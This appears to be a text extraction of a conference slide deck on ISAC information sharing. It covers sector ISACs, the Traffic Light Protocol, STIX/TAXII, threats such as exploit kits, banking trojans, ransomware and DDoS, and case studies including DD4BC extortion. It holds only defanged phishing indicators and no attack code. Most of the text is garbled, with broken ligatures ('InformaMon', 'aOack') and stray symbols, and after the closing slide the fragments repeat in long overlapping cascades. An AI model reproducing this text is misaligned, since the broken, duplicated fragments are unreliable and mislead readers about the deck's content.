Case Studies in ISAC Information Sharing...ISACs • Oil and Natural Gas ISAC (ONG) • Surface...

Information Sharing

Denise Anderson Executive Director

National Health Information Sharing amp Analysis Center (NH-ISAC) Chair National Council of ISACs

     

Agenda

bull What13 is an ISAC

bull Overview of NCI13 bull InformaMon Sharing -shy‐ What13 and How

bull Threats Seen

bull Case Studies

What is an ISAC

Why ISACs

 

 

 

 

 

 

Why ISACs

v Trusted enMMes established by CIKR13 owners and operators

v Comprehensive sector analysis aggregaMon anonymizaMon

v Reach-shy‐within their sectors with other sectors and with government13 to share criMcal informaMon

v All-shy‐hazards approach

v Threat13 level determinaMon for sector

vOperaMonal-shy‐Mmely accurate acMonable

           

ISACs bull AviaMon ISAC

bull CommunicaMons ISAC

bull Defense Industrial Base ISAC

bull Downstream Natural Gas ISAC

bull Electricity ISAC

bull Emergency Management13 amp Response ISAC

bull Financial Services ISAC

bull InformaMon Technology

bull MariMme ISAC

bull MulM-shy‐State ISAC

bull NaMonal Health ISAC

ISAC

         

ISACs bull Oil and Natural Gas ISAC (ONG)

bull Surface TransportaMon

bull Water ISAC

bull Over the Road ampMotor Coach ISAC

bull Public Transit13 ISAC

bull Real Estate ISAC

bull Research and EducaMon ISAC

bull Retail ISAC

bull Supply Chain ISAC

ISAC

     

Other13 OperaKonal EnKKes13 and Upcoming ISACs

bull AutomoKve

bull Chemical bull Food amp Ag

bull Nuclear bull CriMcal Manufacturing

What is the National Council of ISACs

 

 

NaKonal Council of ISACs

Began meeMng in 2003 to address common concerns and cross-shy‐sector interdependencies

Volunteer group of ISACs who meet13 monthly todevelop trusted working relaMonships among sectors on issues of common interest13 and work oniniMaMves of value to CIKR13

 

 

 

NCI13 Structure NaMonal Council of ISACs four designated operaMonalrepresentaMves from each ISAC sit13 on the Council

ISAC Plus all other enMMesrepresentaMves such asoperaMons centers who parMcipate in informaMon sharing

Leadership Chair Denise Anderson-shy‐FS-shy‐ISAC Vice-shy‐Chair ScoO Algeier-shy‐IT-shy‐ISAC Secretary Josh Poster-shy‐ST-shy‐ISAC

Information Sources Communications

Best Practice Sharing -

Joint Statements -White Papers

Monthly Meetings

Daily amp Weekly ISAC

Calls

Briefings ENS Calls And Crisis

Calls

ListServ Trusted

Relationships ISAC Ops Centers

ISACs amp Other

Sectors

DHS amp Other Government Partners

Private Sector Liaison -NICC

Other Sources

(Hundreds)

PCIS

National Council of

ISACs

      

 

 

Examples of AcKviKes

ndash Increase involvement13 of sectors without13 ISACs ndash Daily Weekly Monthly and Crisis calls ndash Cross13 Sector13 InformaKon Sharing13 Portal ndash Private13 Sector13 Liaison with the13 NICC13 ndash DrillsExercises Such as NLEs Cyber Storm

bull OCFndash Implement13 Real-shy‐Time sector Threat13 Level

ReporMng Directorate

  

  

 

  

Points13 of13 Engagementbull NaMonal Infrastructure CoordinaMng Center (NICC) bull NaMonal Cybersecurity and CommunicaMons IntegraMon

Center (NCCIC) ndash DHS-shy‐led Unified OperaMons Watch ampWarning Center ndash Operates 24 hoursday 7 daysweek 365 days a year

bull Unified Command Group-shy‐composed of private and public sector representaMves ndash Meet13 monthly and during an incident13 as needed ndash Advise Assistant13 Secretary of CSampC on cybersecurity maOers provide subject13 maOer experMse and response as necessary during an incident13 that13 requires naMonal coordinaMon

wwwnationalcouncilofisacsorg nationalcouncilofisacsnatlisacsorg

InformaKon13 Sharing Valu e

Structur e

Trust

 

 

 

 

Information Sharing Traffic Light Protocol

curren Restricted to a defined group (eg only those present in ameeting) Information labeled RED should not be shared withanyone outside of the group

curren This information may be shared with FS-ISAC members

curren Information may be shared with FS-ISAC members andpartners (eg vendors MSSPs customers) Information in this category is not to be shared in public forums

curren This information may be shared freely and is subject to standard copyright rules

  

     

 

 

  

 

Types13 of13 InformaKon SharedCyber13 Threats VulnerabiliKes Incidents

uumlMalicious Sites uumlThreat13 Actors ObjecMves13

uumlThreat13 Indicators uumlTTPs Observables uumlCourses13 of AcMon13 uumlExploit13 Targets uumlDenial of Service AOacks

uumlMalicious Emails Phishing Spearphishing

uumlSogtwareVulnerabiliMes

uumlMalicious Sogtware uumlAnalysis and risk miMgaMon

uumlIncident13 response

   

Primary Ways13 InformaKon Is13 Shared

uumlPortalAlerts uumlListservers uumlAutomaMon

Sample of Sharing Thread

Received close to 500 so far and sMll coming in 90 made it13 through to employees before being blocked by perimeter asspam

SubjectImportant13 message from BANK Sender youraccountBANKmessagecom URL hxxpwww2webmasterradiofm FanPageProcssLogonhtml

0 hits last13 7days

Wersquove had about13 50 hits so far all arediscarded

TLP AMBER13 PROPRIETARY INFORMATION

BANK SubmiOed atakedown request13 for the phishing site

Sample of ISAC Sharing

Indicators of Compromise IP Address Subject Line MD5 TTP Malware

Ask a question Anyone else seeing What do you do in this situation How do you handlehelliphelliphelliphellip

Share a Best Practice Herersquos how wehelliphellip

Share a Mitigation Strategy Herersquos a script you can usehelliphellip We did thishelliphellip


 

A Common Language

sect Structured Threat Information Expression is a common language a way for all to speak the same

 

 

 

   

   

Trusted Automated eXchange of Indicator Information (TAXII)

sect The goal of TAXII is to facilitate the exchange of structured cyber threat information sect Designed to support existing sharing paradigms in a

more automated manner

sect TAXII is a set of specifications defining the network-level activity of the exchange sect Defines services and messages to exchange data sect Does NOT dictate HOW data is handled in the

back-end WHAT data is shared or WHO it is shared with

sect TAXII is NOT a sharing program sect TAXII is a protocol over which STIX can be

transported

What is13 Cyber13 Threat Intelligence8 Constructs13 of STIX

Atomic

Tactical

Operational

What threat activity are we seeing

What threats should I look for on my networks and systems and why

Where has this What weaknesses What can I threat been seen does it exploit do about it

Strategic

Who is responsible for this threat

Why do they do this

What do they do

Threats Seen

        

Cyber13 Threat Environment

bull Actors ndash NaMon States ndash Terrorists ndash Criminals ndash Insiders ndash AcMvistsHackMvists ndash Media13 ndash Vendors13

Seen Last Weekhellip Nuclear Exploit13 Kit13

Open VAS Scanning

AnglerNeutrino

PlugX

DDoS

Dridex13

UpatreDyre

13

xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxx

Malware-shy‐Exploit Kits Top Exploit13 Kits Seen

Blackhole EK ndash Paunch 1013 Infinity EK Flash player exploit13 Neutrino13 EK Mixes legiMmate non-shy‐legiMmate requests toobsfuscate the code Magnitude EK -shy‐ Ransomware Sweet Orange13 EK -shy‐ Website Fiesta EK -shy‐ Silverlight13 Angler EK hides behind legiMmate web code Crimeboss13 EK Java exploits

Ransomware

-shy‐Crytolocker-shy‐CryptoWall -shy‐CryptoDefense-shy‐Torrent13 Locker -shy‐Darkleach

Top infecMons USAUCanadaUKIndia Also saw Singapore trend

Delivery Mechanisms PhishingSpearphishing

Court13 NoMce InvoiceStatament13 Shipping Themes DHL Fedex UPS EZ Pass Bank Phish ndash Swigt Transfer Dhgate invoice eFax Salesforce Reward themes Airline ndash Delta13 WhatsApp ndash Yoursquove got13 a voicemail

Malware Banking Trojans Top Trojans13 Seen13

Citadel Kronos Kulouz13 ndash Asprox Carperb13 Zeus13 Zberp13 -shy‐ hybrid13 Game-shy‐over Zeus (GOZ) -shy‐ P2P (arj) 914 Cridex ndash Bugat Feodo Dridex13 DyreShylock ndash July 2014 Takedown

Dyre Spreads Like A Global Virushellip

June 2014 UK US

September 2014 Salesforcecom

Attacked

October 2014 Romania Germany

and Switzerland

November 2014 Over 100 firms

targeted

December 2014 Australia and

China

Delivery Mechanisms

Drive-shy‐by Downloads and Watering13 Holes

Forbescom13 Energystarcom13 AusPost-shy‐trackingcom13 VAgov NBCcom13 ndash Citadel 2013

  

 

Vulnerability Scanning

bull Port13 Scans ndash Open ports bull Vulnerability Scans -shy‐ Wordpress Joomla Java

Flash Open13 SSLbull Infrastructure

     

     

VulnerabiliKes

bull OpenSSLHeartbleed ndash Old vulnerability ndash Allows more data than allowed tondash Website vulnerability ndash Banks took rap unfairly

bull GNU BashShellshock ndash Old vulnerability 1994 ndash Unix based Linux Apple Mac13 OX13 ndash Went13 public13 Wednesday 924 ndash Exploits and scanning seen almost13 immediately

be read

      

   

Breaches Malware ChewBacca Dexter Black POS

Oslash Target 70 million -shy‐ 2013 Oslash OPM 215 million Oslash Primera BCBS 112 million Oslash Community Health Systems 45 million Oslash Anthem13 BCBS 80 million Oslash SonyHacking Team13

2015 Breaches IdenKfied by the ITRC as of13 8112015

bullTotal Breaches13 5500 approx

bullTotal Records Exposed 818004561 bullIdenAty The4 Resource Center

Backoff

      

DDoS Oslash Sony PlayStaMon ndash Lizard Squad Oslash OperaMon13 Ababil13 Oslash Las Vegas ndash Gaming Industry Oslash Israel Oslash DD4BCOslash World Cup

Q1 2015 Compared to Q4 2014

15 decrease in avg aOack Mme35 increase in total DDoS aOacks 42 increase in SSDP DDoS aOacks (routers) 22 increase in aplicaMon layer DDoS aOacks 7 decrease in average aOack bandwidth (170 Gbps) 37 increase in infrastructure layer DDoS aOacks Akamai

 

  

    

  

  

 

Wiper Malware Oslash Shamoon ndash 2012

Oslash ANack on 30000 Saudi Aramco WorkstaMons Oslash Corrupts files and wipes devices

Oslash South Korean ANacksndash13 2013 Oslash 2 banks media company and insurance company Oslash Patch systems targeted and used to infect13 Oslash Wiped windows Linux and UNIX13 OS

Oslash Las Vegas13 Casinondash 2014 Oslash Wiped and destroyed files with VB bomb

Oslash Sony ndash 2014 Oslash SMB Worm13 Tool listening implant backdoor proxy

tool destrucMve hard drive tool destrucMve targeted cleaning tool network propogaMon wiper

Oslash Financial data destroyed financial system13 sMll inoperable ndash asks for delay in filing

    

The Media and Vendors MalverMsing Watering Holes

Syrian Electronic13 Army

Media Vendor Spin Incidents

bull HeartBleed13 Open SSL bull Hedge Fund ANack -shy‐ BAEbull Russians ANack Financial System13 bull Russians Hack 14 Billion Passwords -shy‐ Hold Security

     

Other13 Threats

bull Call Center ndash Phishing bull Mobile bull Social Media ndash Sony ExecuMve on American Airlines bull Industrial Control Systems -shy‐ Havex bull Espionage ndash VirusTotal tesMng for malware

Case Studies

   

DDoS ndash DD4BC

Since April 2015 bullSubject Line bullFrom From DD4BC Team ltd4bct[AT]gmail[]comgt bullSubject DDOS ATTACK

Size 500 Mbps to 50 Gbps Duration Up to 1 hour Ransom Demand 25-40 BTC

UnitedNYSE

NYSE July 8 2015 1132am 1145am chatter Noon definitive word

UNITED 826 am Reservation System

 

 

 

United13 Parcel13 Service

bull USSS NCCIC FS-shy‐ISAC ndashCollaborate to releasemalware analysis and risk miMgaMon recommendaMons

bull Shared with Retailers AssociaKon

bull UPS Detected13 and used13 to miKgate Malware

QuesKons

     

Agenda

bull What13 is an ISAC

bull Overview of NCI13 bull InformaMon Sharing -shy‐ What13 and How

bull Threats Seen

bull Case Studies

What is an ISAC

Why ISACs

 

 

 

 

 

 

Why ISACs







           









bull MariMme ISAC



ISAC

         



bull Water ISAC





bull Retail ISAC


ISAC

     


bull AutomoKve




 

 




 

 

 







Monthly Meetings


Calls


Calls

ListServ Trusted


ISACs amp Other

Sectors



Other Sources

(Hundreds)

PCIS

National Council of

ISACs

      

 

 





  

  

 

  






Structur e

Trust

 

 

 

 






  

     

 

 

  

 








   






0 hits last13 7days










 

A Common Language


 

 

 

   

   







transported


Atomic

Tactical

Operational




Strategic


Why do they do this

What do they do

Threats Seen

        




Open VAS Scanning

AnglerNeutrino

PlugX

DDoS

Dridex13

UpatreDyre

13




Ransomware








June 2014 UK US


Attacked


and Switzerland


targeted


China

Delivery Mechanisms



  

 




     

     

VulnerabiliKes



be read

      

   






Backoff

      




 

  

    

  

  

 








    





     

Other13 Threats


Case Studies

   

DDoS ndash DD4BC



UnitedNYSE



 

 

 





QuesKons

What is an ISAC

Why ISACs

 

 

 

 

 

 

Why ISACs







           









bull MariMme ISAC



ISAC

         



bull Water ISAC





bull Retail ISAC


ISAC

     


bull AutomoKve




 

 




 

 

 







Monthly Meetings


Calls


Calls

ListServ Trusted


ISACs amp Other

Sectors



Other Sources

(Hundreds)

PCIS

National Council of

ISACs

      

 

 





  

  

 

  






Structur e

Trust

 

 

 

 






  

     

 

 

  

 








   






0 hits last13 7days










 

A Common Language


 

 

 

   

   







transported


Atomic

Tactical

Operational




Strategic


Why do they do this

What do they do

Threats Seen

        




Open VAS Scanning

AnglerNeutrino

PlugX

DDoS

Dridex13

UpatreDyre

13




Ransomware








June 2014 UK US


Attacked


and Switzerland


targeted


China

Delivery Mechanisms



  

 




     

     

VulnerabiliKes



be read

      

   






Backoff

      




 

  

    

  

  

 








    





     

Other13 Threats


Case Studies

   

DDoS ndash DD4BC



UnitedNYSE



 

 

 





QuesKons

 

 

 

 

 

 

Why ISACs







           









bull MariMme ISAC



ISAC

         



bull Water ISAC





bull Retail ISAC


ISAC

     


bull AutomoKve




 

 




 

 

 







Monthly Meetings


Calls


Calls

ListServ Trusted


ISACs amp Other

Sectors



Other Sources

(Hundreds)

PCIS

National Council of

ISACs

      

 

 





  

  

 

  






Structur e

Trust

 

 

 

 






  

     

 

 

  

 








   






0 hits last13 7days










 

A Common Language


 

 

 

   

   







transported


Atomic

Tactical

Operational




Strategic


Why do they do this

What do they do

Threats Seen

        




Open VAS Scanning

AnglerNeutrino

PlugX

DDoS

Dridex13

UpatreDyre

13




Ransomware








June 2014 UK US


Attacked


and Switzerland


targeted


China

Delivery Mechanisms



  

 




     

     

VulnerabiliKes



be read

      

   






Backoff

      




 

  

    

  

  

 








    





     

Other13 Threats


Case Studies

   

DDoS ndash DD4BC



UnitedNYSE



 

 

 





QuesKons

           









bull MariMme ISAC



ISAC

         



bull Water ISAC





bull Retail ISAC


ISAC

     


bull AutomoKve




 

 




 

 

 







Monthly Meetings


Calls


Calls

ListServ Trusted


ISACs amp Other

Sectors



Other Sources

(Hundreds)

PCIS

National Council of

ISACs

      

 

 





  

  

 

  






Structur e

Trust

 

 

 

 






  

     

 

 

  

 








   






0 hits last13 7days










 

A Common Language


 

 

 

   

   







transported


Atomic

Tactical

Operational




Strategic


Why do they do this

What do they do

Threats Seen

        




Open VAS Scanning

AnglerNeutrino

PlugX

DDoS

Dridex13

UpatreDyre

13




Ransomware








June 2014 UK US


Attacked


and Switzerland


targeted


China

Delivery Mechanisms



  

 




     

     

VulnerabiliKes



be read

      

   






Backoff

      




 

  

    

  

  

 








    





     

Other13 Threats


Case Studies

   

DDoS ndash DD4BC



UnitedNYSE



 

 

 





QuesKons

         



bull Water ISAC





bull Retail ISAC


ISAC

     


bull AutomoKve




 

 




 

 

 







Monthly Meetings


Calls


Calls

ListServ Trusted


ISACs amp Other

Sectors



Other Sources

(Hundreds)

PCIS

National Council of

ISACs

      

 

 





  

  

 

  






Structur e

Trust

 

 

 

 






  

     

 

 

  

 








   






0 hits last13 7days










 

A Common Language


 

 

 

   

   







transported


Atomic

Tactical

Operational




Strategic


Why do they do this

What do they do

Threats Seen

        




Open VAS Scanning

AnglerNeutrino

PlugX

DDoS

Dridex13

UpatreDyre

13




Ransomware








June 2014 UK US


Attacked


and Switzerland


targeted


China

Delivery Mechanisms



  

 




     

     

VulnerabiliKes



be read

      

   






Backoff

      




 

  

    

  

  

 








    





     

Other13 Threats


Case Studies

   

DDoS ndash DD4BC



UnitedNYSE



 

 

 





QuesKons

     


bull AutomoKve




 

 




 

 

 







Monthly Meetings


Calls


Calls

ListServ Trusted


ISACs amp Other

Sectors



Other Sources

(Hundreds)

PCIS

National Council of

ISACs

      

 

 





  

  

 

  






Structur e

Trust

 

 

 

 






  

     

 

 

  

 








   






0 hits last13 7days










 

A Common Language


 

 

 

   

   







transported


Atomic

Tactical

Operational




Strategic


Why do they do this

What do they do

Threats Seen

        




Open VAS Scanning

AnglerNeutrino

PlugX

DDoS

Dridex13

UpatreDyre

13




Ransomware








June 2014 UK US


Attacked


and Switzerland


targeted


China

Delivery Mechanisms



  

 




     

     

VulnerabiliKes



be read

      

   






Backoff

      




 

  

    

  

  

 








    





     

Other13 Threats


Case Studies

   

DDoS ndash DD4BC



UnitedNYSE



 

 

 





QuesKons


 

 




 

 

 







Monthly Meetings


Calls


Calls

ListServ Trusted


ISACs amp Other

Sectors



Other Sources

(Hundreds)

PCIS

National Council of

ISACs

      

 

 





  

  

 

  






Structur e

Trust

 

 

 

 






  

     

 

 

  

 








   






0 hits last13 7days










 

A Common Language


 

 

 

   

   







transported


Atomic

Tactical

Operational




Strategic


Why do they do this

What do they do

Threats Seen

        




Open VAS Scanning

AnglerNeutrino

PlugX

DDoS

Dridex13

UpatreDyre

13




Ransomware








June 2014 UK US


Attacked


and Switzerland


targeted


China

Delivery Mechanisms



  

 




     

     

VulnerabiliKes



be read

      

   






Backoff

      




 

  

    

  

  

 








    





     

Other13 Threats


Case Studies

   

DDoS ndash DD4BC



UnitedNYSE



 

 

 





QuesKons

      

 

 





  

  

 

  






Structur e

Trust

 

 

 

 






  

     

 

 

  

 








   






0 hits last13 7days










 

A Common Language


 

 

 

   

   







transported


Atomic

Tactical

Operational




Strategic


Why do they do this

What do they do

Threats Seen

        




Open VAS Scanning

AnglerNeutrino

PlugX

DDoS

Dridex13

UpatreDyre

13




Ransomware








June 2014 UK US


Attacked


and Switzerland


targeted


China

Delivery Mechanisms



  

 




     

     

VulnerabiliKes



be read

      

   






Backoff

      




 

  

    

  

  

 








    





     

Other13 Threats


Case Studies

   

DDoS ndash DD4BC



UnitedNYSE



 

 

 





QuesKons

 

 

 

 






  

     

 

 

  

 








   






0 hits last13 7days










 

A Common Language


 

 

 

   

   







transported


Atomic

Tactical

Operational




Strategic


Why do they do this

What do they do

Threats Seen

        




Open VAS Scanning

AnglerNeutrino

PlugX

DDoS

Dridex13

UpatreDyre

13




Ransomware








June 2014 UK US


Attacked


and Switzerland


targeted


China

Delivery Mechanisms



  

 




     

     

VulnerabiliKes



be read

      

   






Backoff

      




 

  

    

  

  

 








    





     

Other13 Threats


Case Studies

   

DDoS ndash DD4BC



UnitedNYSE



 

 

 





QuesKons







 

A Common Language


 

 

 

   

   







transported


Atomic

Tactical

Operational




Strategic


Why do they do this

What do they do

Threats Seen

        




Open VAS Scanning

AnglerNeutrino

PlugX

DDoS

Dridex13

UpatreDyre

13




Ransomware








June 2014 UK US


Attacked


and Switzerland


targeted


China

Delivery Mechanisms



  

 




     

     

VulnerabiliKes



be read

      

   






Backoff

      




 

  

    

  

  

 








    





     

Other13 Threats


Case Studies

   

DDoS ndash DD4BC



UnitedNYSE



 

 

 





QuesKons

 

 

 

   

   







transported


Atomic

Tactical

Operational




Strategic


Why do they do this

What do they do

Threats Seen

        




Open VAS Scanning

AnglerNeutrino

PlugX

DDoS

Dridex13

UpatreDyre

13




Ransomware








June 2014 UK US


Attacked


and Switzerland


targeted


China

Delivery Mechanisms



  

 




     

     

VulnerabiliKes



be read

      

   






Backoff

      




 

  

    

  

  

 








    





     

Other13 Threats


Case Studies

   

DDoS ndash DD4BC



UnitedNYSE



 

 

 





QuesKons


Atomic

Tactical

Operational




Strategic


Why do they do this

What do they do

Threats Seen

        




Open VAS Scanning

AnglerNeutrino

PlugX

DDoS

Dridex13

UpatreDyre

13




Ransomware








June 2014 UK US


Attacked


and Switzerland


targeted


China

Delivery Mechanisms



  

 




     

     

VulnerabiliKes



be read

      

   






Backoff

      




 

  

    

  

  

 








    





     

Other13 Threats


Case Studies

   

DDoS ndash DD4BC



UnitedNYSE



 

 

 





QuesKons

Threats Seen

        




Open VAS Scanning

AnglerNeutrino

PlugX

DDoS

Dridex13

UpatreDyre

13




Ransomware








June 2014 UK US


Attacked


and Switzerland


targeted


China

Delivery Mechanisms



  

 




     

     

VulnerabiliKes



be read

      

   






Backoff

      




 

  

    

  

  

 








    





     

Other13 Threats


Case Studies

   

DDoS ndash DD4BC



UnitedNYSE



 

 

 





QuesKons

        




Open VAS Scanning

AnglerNeutrino

PlugX

DDoS

Dridex13

UpatreDyre

13




Ransomware








June 2014 UK US


Attacked


and Switzerland


targeted


China

Delivery Mechanisms



  

 




     

     

VulnerabiliKes



be read

      

   






Backoff

      




 

  

    

  

  

 








    





     

Other13 Threats


Case Studies

   

DDoS ndash DD4BC



UnitedNYSE



 

 

 





QuesKons

13




Ransomware








June 2014 UK US


Attacked


and Switzerland


targeted


China

Delivery Mechanisms



  

 




     

     

VulnerabiliKes



be read

      

   






Backoff

      




 

  

    

  

  

 








    





     

Other13 Threats


Case Studies

   

DDoS ndash DD4BC



UnitedNYSE



 

 

 





QuesKons

Ransomware








June 2014 UK US


Attacked


and Switzerland


targeted


China

Delivery Mechanisms



  

 




     

     

VulnerabiliKes



be read

      

   






Backoff

      




 

  

    

  

  

 








    





     

Other13 Threats


Case Studies

   

DDoS ndash DD4BC



UnitedNYSE



 

 

 





QuesKons






June 2014 UK US


Attacked


and Switzerland


targeted


China

Delivery Mechanisms



  

 




     

     

VulnerabiliKes



be read

      

   






Backoff

      




 

  

    

  

  

 








    





     

Other13 Threats


Case Studies

   

DDoS ndash DD4BC



UnitedNYSE



 

 

 





QuesKons

Delivery Mechanisms



  

 




     

     

VulnerabiliKes



be read

      

   






Backoff

      




 

  

    

  

  

 








    





     

Other13 Threats


Case Studies

   

DDoS ndash DD4BC



UnitedNYSE



 

 

 





QuesKons

  

 




     

     

VulnerabiliKes



be read

      

   






Backoff

      




 

  

    

  

  

 








    





     

Other13 Threats


Case Studies

   

DDoS ndash DD4BC



UnitedNYSE



 

 

 





QuesKons

      

   






Backoff

      




 

  

    

  

  

 








    





     

Other13 Threats


Case Studies

   

DDoS ndash DD4BC



UnitedNYSE



 

 

 





QuesKons

      




 

  

    

  

  

 








    





     

Other13 Threats


Case Studies

   

DDoS ndash DD4BC



UnitedNYSE



 

 

 





QuesKons

Case Studies

   

DDoS ndash DD4BC



UnitedNYSE



 

 

 





QuesKons

   

DDoS ndash DD4BC



UnitedNYSE



 

 

 





QuesKons

UnitedNYSE



 

 

 





QuesKons

 

 

 





QuesKons

Case Studies in ISAC Information Sharing...ISACs • Oil and Natural Gas ISAC (ONG) • Surface...

Documents

Transcript of Case Studies in ISAC Information Sharing...ISACs • Oil and Natural Gas ISAC (ONG) • Surface...